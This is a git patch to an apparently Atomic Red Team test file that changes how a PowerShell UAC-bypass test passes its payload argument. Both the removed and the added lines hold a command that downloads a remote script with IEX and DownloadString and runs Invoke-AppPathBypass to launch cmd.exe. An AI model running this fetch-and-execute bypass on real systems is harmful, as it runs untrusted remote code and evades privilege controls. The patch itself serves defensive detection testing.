From fe943551bd1eb9986a5e50ae3c1af99e6e2dc33d Mon Sep 17 00:00:00 2001
From: Makenzie Schwartz <mschwartz@carbonblack.com>
Date: Fri, 9 Aug 2019 07:21:58 -0700
Subject: [PATCH] Supply Invoke-AppPathBypass with Payload as argument (#522)

---
 atomics/T1086/T1086.yaml | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/atomics/T1086/T1086.yaml b/atomics/T1086/T1086.yaml
index 30df34a6..77008bca 100644
--- a/atomics/T1086/T1086.yaml
+++ b/atomics/T1086/T1086.yaml
@@ -78,8 +78,7 @@ atomic_tests:
   executor:
     name: command_prompt
     command: |
-      Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass"
-      C:\Windows\System32\cmd.exe
+      Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
 
 - name: PowerShell Add User
   description: |